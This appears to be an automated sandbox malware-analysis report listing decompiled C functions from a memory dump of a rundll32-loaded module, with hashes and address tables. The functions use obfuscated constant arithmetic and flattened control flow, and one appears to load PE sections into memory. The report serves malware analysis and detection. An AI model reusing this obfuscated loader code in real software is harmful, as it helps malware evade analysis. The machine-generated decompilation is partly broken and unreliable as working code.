                                                                                                                                                            0x00388ec2
                                                                                                                                                            0x00388ec8
                                                                                                                                                            0x00388ec9
                                                                                                                                                            0x00388eca
                                                                                                                                                            0x00388ecc
                                                                                                                                                            0x00388ed1
                                                                                                                                                            0x00388ed4
                                                                                                                                                            0x00388ed7
                                                                                                                                                            0x00388ede
                                                                                                                                                            0x00388edf
                                                                                                                                                            0x00388ee2
                                                                                                                                                            0x00388ee5
                                                                                                                                                            0x00388ee5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ulG$wV
                                                                                                                                                            • API String ID: 0-391097709
                                                                                                                                                            • Opcode ID: 70976c996b03bc686988bd41861860908097d0c82c60c6b68d257156c33f3412
                                                                                                                                                            • Instruction ID: cabb98a6f98f5d9ee46259b30994d1619185b57959e77a328ef04f68f3d7c61f
                                                                                                                                                            • Opcode Fuzzy Hash: 70976c996b03bc686988bd41861860908097d0c82c60c6b68d257156c33f3412
                                                                                                                                                            • Instruction Fuzzy Hash: 55917471D00319EBCB14DFE9D88A9DEBBB1FF44314F208149E216BA290C7B41A45CF95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E00376D24() {
                                                                                                                                                            				char _v524;
                                                                                                                                                            				signed int _v528;
                                                                                                                                                            				signed int _v532;
                                                                                                                                                            				signed int _v536;
                                                                                                                                                            				signed int _v540;
                                                                                                                                                            				signed int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				signed int _v552;
                                                                                                                                                            				signed int _v556;
                                                                                                                                                            				signed int _v560;
                                                                                                                                                            				signed int _v564;
                                                                                                                                                            				signed int _v568;
                                                                                                                                                            				signed int _v572;
                                                                                                                                                            				signed int _v576;
                                                                                                                                                            				signed int _v580;
                                                                                                                                                            				signed int _v584;
                                                                                                                                                            				signed int _v588;
                                                                                                                                                            				signed int _v592;
                                                                                                                                                            				short* _t158;
                                                                                                                                                            				void* _t161;
                                                                                                                                                            				void* _t164;
                                                                                                                                                            				intOrPtr _t173;
                                                                                                                                                            				intOrPtr _t188;
                                                                                                                                                            				signed int _t192;
                                                                                                                                                            				signed int _t193;
                                                                                                                                                            				signed int _t194;
                                                                                                                                                            				signed int _t195;
                                                                                                                                                            				void* _t198;
                                                                                                                                                            
                                                                                                                                                            				_v556 = 0x5b9523;
                                                                                                                                                            				_v556 = _v556 ^ 0xd644881d;
                                                                                                                                                            				_t164 = 0xafec1cc;
                                                                                                                                                            				_v556 = _v556 ^ 0xd61fc18a;
                                                                                                                                                            				_v560 = 0xf0211a;
                                                                                                                                                            				_v560 = _v560 >> 0xc;
                                                                                                                                                            				_v560 = _v560 >> 0xf;
                                                                                                                                                            				_v560 = _v560 ^ 0x000d86e8;
                                                                                                                                                            				_v536 = 0x5b86ee;
                                                                                                                                                            				_t192 = 0x7a;
                                                                                                                                                            				_v536 = _v536 / _t192;
                                                                                                                                                            				_v536 = _v536 ^ 0x00051f37;
                                                                                                                                                            				_v528 = 0x15dba1;
                                                                                                                                                            				_v528 = _v528 + 0xffff3226;
                                                                                                                                                            				_v528 = _v528 ^ 0x001c60e6;
                                                                                                                                                            				_v564 = 0xcdfacc;
                                                                                                                                                            				_v564 = _v564 ^ 0x78a7d3e3;
                                                                                                                                                            				_v564 = _v564 << 0xe;
                                                                                                                                                            				_v564 = _v564 ^ 0x8a48a6fd;
                                                                                                                                                            				_v572 = 0x7eccf1;
                                                                                                                                                            				_v572 = _v572 + 0xffffd1bc;
                                                                                                                                                            				_t193 = 0x2e;
                                                                                                                                                            				_v572 = _v572 * 0x26;
                                                                                                                                                            				_v572 = _v572 ^ 0x12c53124;
                                                                                                                                                            				_v588 = 0x8dc921;
                                                                                                                                                            				_v588 = _v588 | 0x53df5653;
                                                                                                                                                            				_v588 = _v588 << 7;
                                                                                                                                                            				_v588 = _v588 * 0x73;
                                                                                                                                                            				_v588 = _v588 ^ 0xc8beb34e;
                                                                                                                                                            				_v544 = 0xe1fa74;
                                                                                                                                                            				_v544 = _v544 + 0xffffe6ac;
                                                                                                                                                            				_v544 = _v544 ^ 0x00e0f2b8;
                                                                                                                                                            				_v568 = 0x925246;
                                                                                                                                                            				_v568 = _v568 + 0xffffcd65;
                                                                                                                                                            				_v568 = _v568 + 0xffffdee0;
                                                                                                                                                            				_v568 = _v568 ^ 0x009eae97;
                                                                                                                                                            				_v576 = 0x3c09b4;
                                                                                                                                                            				_v576 = _v576 + 0xffff2c4c;
                                                                                                                                                            				_v576 = _v576 >> 0xa;
                                                                                                                                                            				_v576 = _v576 ^ 0x000cc2c3;
                                                                                                                                                            				_v592 = 0xac7846;
                                                                                                                                                            				_v592 = _v592 ^ 0xbb2572b9;
                                                                                                                                                            				_v592 = _v592 ^ 0xeb3265e6;
                                                                                                                                                            				_v592 = _v592 | 0x6a541c4b;
                                                                                                                                                            				_v592 = _v592 ^ 0x7af30806;
                                                                                                                                                            				_v548 = 0xb1a24a;
                                                                                                                                                            				_v548 = _v548 / _t193;
                                                                                                                                                            				_v548 = _v548 ^ 0x00094ccb;
                                                                                                                                                            				_v552 = 0xbe5b93;
                                                                                                                                                            				_v552 = _v552 | 0xe01e3375;
                                                                                                                                                            				_v552 = _v552 ^ 0xe0b0d42a;
                                                                                                                                                            				_v532 = 0x76dce5;
                                                                                                                                                            				_t194 = 0x19;
                                                                                                                                                            				_v532 = _v532 / _t194;
                                                                                                                                                            				_v532 = _v532 ^ 0x00002403;
                                                                                                                                                            				_v584 = 0xffb3b0;
                                                                                                                                                            				_v584 = _v584 << 0xc;
                                                                                                                                                            				_v584 = _v584 ^ 0x8b2427a7;
                                                                                                                                                            				_v584 = _v584 | 0x0ff5fda2;
                                                                                                                                                            				_v584 = _v584 ^ 0x7ffdbf2b;
                                                                                                                                                            				_v580 = 0x6f9ecd;
                                                                                                                                                            				_t195 = 0x5b;
                                                                                                                                                            				_v580 = _v580 / _t195;
                                                                                                                                                            				_v580 = _v580 << 0xc;
                                                                                                                                                            				_v580 = _v580 ^ 0x13a22276;
                                                                                                                                                            				_v540 = 0xd8d341;
                                                                                                                                                            				_v540 = _v540 * 0xb;
                                                                                                                                                            				_v540 = _v540 ^ 0x095c7847;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t164 != 0x2dc4ff7) {
                                                                                                                                                            						if(_t164 == 0x5cfc1e4) {
                                                                                                                                                            							return E00379DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00374EE3, _v540, 0);
                                                                                                                                                            						}
                                                                                                                                                            						if(_t164 == 0x9efe9dd) {
                                                                                                                                                            							_push(_v536);
                                                                                                                                                            							_push(_v560);
                                                                                                                                                            							_t161 = E0038DCF7(_v556, 0x371000, __eflags);
                                                                                                                                                            							_t173 =  *0x393e10; // 0x0
                                                                                                                                                            							_t188 =  *0x393e10; // 0x0
                                                                                                                                                            							E003747CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
                                                                                                                                                            							_t158 = E0037A8B0(_v568, _t161, _v576);
                                                                                                                                                            							_t198 = _t198 + 0x24;
                                                                                                                                                            							_t164 = 0x2dc4ff7;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t164 != 0xafec1cc) {
                                                                                                                                                            							goto L8;
                                                                                                                                                            						}
                                                                                                                                                            						_t164 = 0x9efe9dd;
                                                                                                                                                            					}
                                                                                                                                                            					_t158 = E0037B6CF( &_v524, _v592, _v548, _v552);
                                                                                                                                                            					__eflags = 0;
                                                                                                                                                            					 *_t158 = 0;
                                                                                                                                                            					_t164 = 0x5cfc1e4;
                                                                                                                                                            					L8:
                                                                                                                                                            					__eflags = _t164 - 0xdc02af8;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				return _t158;
                                                                                                                                                            			}
































                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Gx\$e2
                                                                                                                                                            • API String ID: 0-3912940318
                                                                                                                                                            • Opcode ID: 684a4d32d7f8719bfa44206250378e0d0e495ee7bb642b2139c129793b45ab7e
                                                                                                                                                            • Instruction ID: b039146e7b4bb5bda198057bf13ec323d954208c168c2c2d699cdb01f3c3dcc7
                                                                                                                                                            • Opcode Fuzzy Hash: 684a4d32d7f8719bfa44206250378e0d0e495ee7bb642b2139c129793b45ab7e
                                                                                                                                                            • Instruction Fuzzy Hash: 297140711083409FC369CF21D88A91FBBF1FBC4748F108A1DF29A9A260D3B59949CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0037A55F() {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				signed int _v524;
                                                                                                                                                            				signed int _v528;
                                                                                                                                                            				intOrPtr _v532;
                                                                                                                                                            				signed int _v536;
                                                                                                                                                            				signed int _v540;
                                                                                                                                                            				signed int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				signed int _v552;
                                                                                                                                                            				signed int _v556;
                                                                                                                                                            				signed int _v560;
                                                                                                                                                            				signed int _v564;
                                                                                                                                                            				signed int _v568;
                                                                                                                                                            				signed int _v572;
                                                                                                                                                            				signed int _v576;
                                                                                                                                                            				signed int _v580;
                                                                                                                                                            				signed int _v584;
                                                                                                                                                            				signed int _t161;
                                                                                                                                                            				char* _t162;
                                                                                                                                                            				intOrPtr _t164;
                                                                                                                                                            				void* _t168;
                                                                                                                                                            				signed int _t187;
                                                                                                                                                            				signed int _t189;
                                                                                                                                                            				signed int _t190;
                                                                                                                                                            				signed int _t191;
                                                                                                                                                            				signed int _t192;
                                                                                                                                                            				short* _t195;
                                                                                                                                                            				signed int* _t197;
                                                                                                                                                            
                                                                                                                                                            				_t197 =  &_v584;
                                                                                                                                                            				_v528 = _v528 & 0x00000000;
                                                                                                                                                            				_v524 = _v524 & 0x00000000;
                                                                                                                                                            				_t168 = 0xe71c2f1;
                                                                                                                                                            				_v532 = 0xa0346f;
                                                                                                                                                            				_v560 = 0x45ed96;
                                                                                                                                                            				_t187 = 0x29;
                                                                                                                                                            				_v560 = _v560 / _t187;
                                                                                                                                                            				_t189 = 0x5d;
                                                                                                                                                            				_v560 = _v560 * 0x5e;
                                                                                                                                                            				_v560 = _v560 ^ 0x00ac5e2c;
                                                                                                                                                            				_v568 = 0x587b3f;
                                                                                                                                                            				_v568 = _v568 >> 1;
                                                                                                                                                            				_v568 = _v568 >> 6;
                                                                                                                                                            				_v568 = _v568 + 0x3200;
                                                                                                                                                            				_v568 = _v568 ^ 0x000d20ef;
                                                                                                                                                            				_v540 = 0x1767bf;
                                                                                                                                                            				_v540 = _v540 >> 0xa;
                                                                                                                                                            				_v540 = _v540 ^ 0x00010300;
                                                                                                                                                            				_v548 = 0xad8e3d;
                                                                                                                                                            				_v548 = _v548 ^ 0x5762e507;
                                                                                                                                                            				_v548 = _v548 ^ 0xbd28358e;
                                                                                                                                                            				_v548 = _v548 ^ 0xeae8e106;
                                                                                                                                                            				_v584 = 0xa1a61c;
                                                                                                                                                            				_v584 = _v584 * 0x38;
                                                                                                                                                            				_v584 = _v584 + 0xffff1963;
                                                                                                                                                            				_v584 = _v584 | 0xaacebf86;
                                                                                                                                                            				_v584 = _v584 ^ 0xabd4b38c;
                                                                                                                                                            				_v556 = 0xa4c35b;
                                                                                                                                                            				_v556 = _v556 / _t189;
                                                                                                                                                            				_v556 = _v556 | 0xf6aeb391;
                                                                                                                                                            				_v556 = _v556 ^ 0xf6ac7ee7;
                                                                                                                                                            				_v536 = 0xf31b8a;
                                                                                                                                                            				_v536 = _v536 | 0x87603e20;
                                                                                                                                                            				_v536 = _v536 ^ 0x87f7aca9;
                                                                                                                                                            				_v576 = 0x423791;
                                                                                                                                                            				_v576 = _v576 + 0xffffb580;
                                                                                                                                                            				_v576 = _v576 + 0x7a73;
                                                                                                                                                            				_v576 = _v576 ^ 0x7a6e2c80;
                                                                                                                                                            				_v576 = _v576 ^ 0x7a24ad4c;
                                                                                                                                                            				_v544 = 0x7ccdad;
                                                                                                                                                            				_v544 = _v544 << 7;
                                                                                                                                                            				_v544 = _v544 ^ 0x3e66d3ae;
                                                                                                                                                            				_v572 = 0x1eeccc;
                                                                                                                                                            				_v572 = _v572 | 0x2c9b1d75;
                                                                                                                                                            				_v572 = _v572 << 6;
                                                                                                                                                            				_t190 = 0x5b;
                                                                                                                                                            				_v572 = _v572 / _t190;
                                                                                                                                                            				_v572 = _v572 ^ 0x007e2283;
                                                                                                                                                            				_v552 = 0x119b6d;
                                                                                                                                                            				_t191 = 0x5a;
                                                                                                                                                            				_v552 = _v552 / _t191;
                                                                                                                                                            				_v552 = _v552 ^ 0xceecc8a8;
                                                                                                                                                            				_v552 = _v552 ^ 0xceebe4d8;
                                                                                                                                                            				_v580 = 0x5ef79f;
                                                                                                                                                            				_v580 = _v580 / _t187;
                                                                                                                                                            				_v580 = _v580 | 0x8cf80c97;
                                                                                                                                                            				_t192 = 0x3d;
                                                                                                                                                            				_v580 = _v580 / _t192;
                                                                                                                                                            				_v580 = _v580 ^ 0x02499ffb;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t168 != 0xc65bb2) {
                                                                                                                                                            						if(_t168 == 0x63f282e) {
                                                                                                                                                            							_t162 = E0038DA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
                                                                                                                                                            							_t197 =  &(_t197[4]);
                                                                                                                                                            							_t168 = 0xc65bb2;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t168 == 0xb3c9692) {
                                                                                                                                                            							_t164 =  *0x393e10; // 0x0
                                                                                                                                                            							__eflags = _t164 + 0x1c;
                                                                                                                                                            							return E00373BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
                                                                                                                                                            						}
                                                                                                                                                            						if(_t168 != 0xe71c2f1) {
                                                                                                                                                            							goto L15;
                                                                                                                                                            						}
                                                                                                                                                            						_t168 = 0x63f282e;
                                                                                                                                                            					}
                                                                                                                                                            					_v564 = 0x8b8c25;
                                                                                                                                                            					_v564 = _v564 * 0x78;
                                                                                                                                                            					_v564 = _v564 + 0xffff9cfb;
                                                                                                                                                            					_v564 = _v564 ^ 0x41694e51;
                                                                                                                                                            					_t161 = E0037CB52(_v584,  &_v520, _v556, _v536, _v576);
                                                                                                                                                            					_t197 =  &(_t197[3]);
                                                                                                                                                            					_t195 =  &_v520 + _t161 * 2;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t162 =  &_v520;
                                                                                                                                                            						__eflags = _t195 - _t162;
                                                                                                                                                            						if(_t195 <= _t162) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags =  *_t195 - 0x5c;
                                                                                                                                                            						if( *_t195 != 0x5c) {
                                                                                                                                                            							L10:
                                                                                                                                                            							_t195 = _t195 - 2;
                                                                                                                                                            							__eflags = _t195;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						_t139 =  &_v564;
                                                                                                                                                            						 *_t139 = _v564 - 1;
                                                                                                                                                            						__eflags =  *_t139;
                                                                                                                                                            						if( *_t139 == 0) {
                                                                                                                                                            							__eflags = _t195;
                                                                                                                                                            							L14:
                                                                                                                                                            							_t168 = 0xb3c9692;
                                                                                                                                                            							goto L15;
                                                                                                                                                            						}
                                                                                                                                                            						goto L10;
                                                                                                                                                            					}
                                                                                                                                                            					goto L14;
                                                                                                                                                            					L15:
                                                                                                                                                            					__eflags = _t168 - 0x6143c47;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				return _t162;
                                                                                                                                                            			}































                                                                                                                                                            0x0037a7e0
                                                                                                                                                            0x0037a7e0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7e0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7ce
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7e2
                                                                                                                                                            0x0037a7e2
                                                                                                                                                            0x0037a7e2
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: QNiA$sz
                                                                                                                                                            • API String ID: 0-294658094
                                                                                                                                                            • Opcode ID: 682f998a4001ed43f1c155042cb33f11fd60038c11f217245d7ea0fae09bc0a3
                                                                                                                                                            • Instruction ID: abf6c091fac08a1a441e2fab5aca1b21c0681e77d5f8c581c0bf842962c3caa1
                                                                                                                                                            • Opcode Fuzzy Hash: 682f998a4001ed43f1c155042cb33f11fd60038c11f217245d7ea0fae09bc0a3
                                                                                                                                                            • Instruction Fuzzy Hash: 0E7166715093819BC3A8CF66D58541FBBF1FBC4718F40891DF59AA6260D379CA098F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038C3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				void* _t137;
                                                                                                                                                            				void* _t149;
                                                                                                                                                            				void* _t159;
                                                                                                                                                            				void* _t161;
                                                                                                                                                            				signed int _t163;
                                                                                                                                                            				signed int _t164;
                                                                                                                                                            				signed int _t165;
                                                                                                                                                            				signed int _t166;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				void* _t188;
                                                                                                                                                            				void* _t193;
                                                                                                                                                            				intOrPtr* _t195;
                                                                                                                                                            				signed int* _t197;
                                                                                                                                                            				signed int* _t198;
                                                                                                                                                            				signed int* _t199;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t195 = __ecx;
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t137);
                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                            				_v12 = 0x8437e8;
                                                                                                                                                            				_v8 = 0xdb9720;
                                                                                                                                                            				_v60 = 0xf5e956;
                                                                                                                                                            				_v60 = _v60 << 0xc;
                                                                                                                                                            				_t163 = 0x6b;
                                                                                                                                                            				_v60 = _v60 / _t163;
                                                                                                                                                            				_v60 = _v60 | 0x488cc8ef;
                                                                                                                                                            				_v60 = _v60 ^ 0x48eedbff;
                                                                                                                                                            				_v44 = 0x82c5a5;
                                                                                                                                                            				_v44 = _v44 | 0x04b6a6f1;
                                                                                                                                                            				_t164 = 0x4a;
                                                                                                                                                            				_v44 = _v44 * 0x6a;
                                                                                                                                                            				_v44 = _v44 ^ 0xf3bc2b72;
                                                                                                                                                            				_v40 = 0x882fad;
                                                                                                                                                            				_v40 = _v40 ^ 0x709d76bd;
                                                                                                                                                            				_v40 = _v40 + 0xffff52d2;
                                                                                                                                                            				_v40 = _v40 ^ 0x7014aba2;
                                                                                                                                                            				_v28 = 0x22e756;
                                                                                                                                                            				_v28 = _v28 + 0x769a;
                                                                                                                                                            				_v28 = _v28 ^ 0x002bcc4a;
                                                                                                                                                            				_v64 = 0xc290d0;
                                                                                                                                                            				_v64 = _v64 + 0xffff641a;
                                                                                                                                                            				_v64 = _v64 << 0xd;
                                                                                                                                                            				_v64 = _v64 ^ 0xbd78a131;
                                                                                                                                                            				_v64 = _v64 ^ 0x83ed8c94;
                                                                                                                                                            				_v32 = 0x78b1b0;
                                                                                                                                                            				_v32 = _v32 << 0xe;
                                                                                                                                                            				_v32 = _v32 ^ 0x2c621b2d;
                                                                                                                                                            				_v36 = 0xa1b61f;
                                                                                                                                                            				_v36 = _v36 + 0xb017;
                                                                                                                                                            				_v36 = _v36 | 0xc1836c3e;
                                                                                                                                                            				_v36 = _v36 ^ 0xc1a0ee75;
                                                                                                                                                            				_v56 = 0x2861cb;
                                                                                                                                                            				_v56 = _v56 / _t164;
                                                                                                                                                            				_v56 = _v56 << 0xd;
                                                                                                                                                            				_t165 = 0x1b;
                                                                                                                                                            				_v56 = _v56 / _t165;
                                                                                                                                                            				_v56 = _v56 ^ 0x00aa9f16;
                                                                                                                                                            				_v24 = 0x4a8582;
                                                                                                                                                            				_v24 = _v24 | 0x39704e96;
                                                                                                                                                            				_v24 = _v24 ^ 0x397cf0ca;
                                                                                                                                                            				_v52 = 0x9fdf3f;
                                                                                                                                                            				_v52 = _v52 | 0x733ecb9c;
                                                                                                                                                            				_v52 = _v52 >> 0x10;
                                                                                                                                                            				_t166 = 0x2c;
                                                                                                                                                            				_v52 = _v52 / _t166;
                                                                                                                                                            				_v52 = _v52 ^ 0x0002453b;
                                                                                                                                                            				_v20 = 0x70cd9;
                                                                                                                                                            				_v20 = _v20 ^ 0x0384d77a;
                                                                                                                                                            				_v20 = _v20 ^ 0x03811849;
                                                                                                                                                            				_v16 = 0x6ca56e;
                                                                                                                                                            				_v16 = _v16 * 0x1c;
                                                                                                                                                            				_v16 = _v16 ^ 0x0be055d0;
                                                                                                                                                            				_v48 = 0x383b50;
                                                                                                                                                            				_v48 = _v48 + 0xe78c;
                                                                                                                                                            				_v48 = _v48 + 0x7960;
                                                                                                                                                            				_v48 = _v48 + 0xffff251b;
                                                                                                                                                            				_v48 = _v48 ^ 0x003eca00;
                                                                                                                                                            				_t167 = _v28;
                                                                                                                                                            				_t149 = E0037474F(_t167, __ecx, _v64, _v32);
                                                                                                                                                            				_t159 = _t149;
                                                                                                                                                            				_t197 =  &(( &_v64)[8]);
                                                                                                                                                            				if(_t159 != 0) {
                                                                                                                                                            					_push(_t167);
                                                                                                                                                            					_t188 = E0037A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
                                                                                                                                                            					_t198 =  &(_t197[5]);
                                                                                                                                                            					if(_t188 == 0) {
                                                                                                                                                            						L6:
                                                                                                                                                            						return _t188;
                                                                                                                                                            					}
                                                                                                                                                            					E0037ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
                                                                                                                                                            					_t199 =  &(_t198[3]);
                                                                                                                                                            					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
                                                                                                                                                            					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
                                                                                                                                                            					while(_t193 < _t161) {
                                                                                                                                                            						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
                                                                                                                                                            						E0037ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
                                                                                                                                                            						_t199 =  &(_t199[3]);
                                                                                                                                                            						_t193 = _t193 + 0x28;
                                                                                                                                                            					}
                                                                                                                                                            					goto L6;
                                                                                                                                                            				}
                                                                                                                                                            				return _t149;
                                                                                                                                                            			}



































                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: V"$`y
                                                                                                                                                            • API String ID: 0-2031334757
                                                                                                                                                            • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                                            • Instruction ID: e29cc621af6aa69c1800f9a46c30f6205f4f8b1b59ff35d242c1567c9fbb27e8
                                                                                                                                                            • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                                            • Instruction Fuzzy Hash: 0C6145B15183409FC354CF66C88991BBBF1FBC9718F108A1CF69A9A260D7B6D919CF06
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00380B19(void* __ecx) {
                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                            				void* _t160;
                                                                                                                                                            				void* _t164;
                                                                                                                                                            				signed int _t166;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				signed int _t168;
                                                                                                                                                            				signed int _t169;
                                                                                                                                                            				signed int _t170;
                                                                                                                                                            				intOrPtr _t190;
                                                                                                                                                            				intOrPtr* _t191;
                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                            				signed int* _t194;
                                                                                                                                                            
                                                                                                                                                            				_t194 =  &_v68;
                                                                                                                                                            				_v12 = 0xec215;
                                                                                                                                                            				_v8 = 0x867af3;
                                                                                                                                                            				_t190 =  *0x393208; // 0x0
                                                                                                                                                            				_v4 = 0;
                                                                                                                                                            				_t164 = __ecx;
                                                                                                                                                            				_v64 = 0x2d9572;
                                                                                                                                                            				_t191 = _t190 + 0x20c;
                                                                                                                                                            				_v64 = _v64 + 0xffff7051;
                                                                                                                                                            				_v64 = _v64 ^ 0xb4c09ebb;
                                                                                                                                                            				_v64 = _v64 | 0x08f8e0e6;
                                                                                                                                                            				_v64 = _v64 ^ 0xbcfdfbfe;
                                                                                                                                                            				_v40 = 0xaf9231;
                                                                                                                                                            				_v40 = _v40 + 0x3789;
                                                                                                                                                            				_v40 = _v40 + 0x1acf;
                                                                                                                                                            				_v40 = _v40 ^ 0x00adbfc0;
                                                                                                                                                            				_v68 = 0xf5f340;
                                                                                                                                                            				_v68 = _v68 ^ 0x3b0075db;
                                                                                                                                                            				_v68 = _v68 >> 1;
                                                                                                                                                            				_v68 = _v68 + 0xaae2;
                                                                                                                                                            				_v68 = _v68 ^ 0x1dff90e5;
                                                                                                                                                            				_v24 = 0xe1803e;
                                                                                                                                                            				_v24 = _v24 + 0x946c;
                                                                                                                                                            				_v24 = _v24 ^ 0x00ebebe2;
                                                                                                                                                            				_v44 = 0xcb8087;
                                                                                                                                                            				_t166 = 0x7f;
                                                                                                                                                            				_v44 = _v44 / _t166;
                                                                                                                                                            				_v44 = _v44 << 5;
                                                                                                                                                            				_v44 = _v44 ^ 0x00394faa;
                                                                                                                                                            				_v32 = 0x6e7c9c;
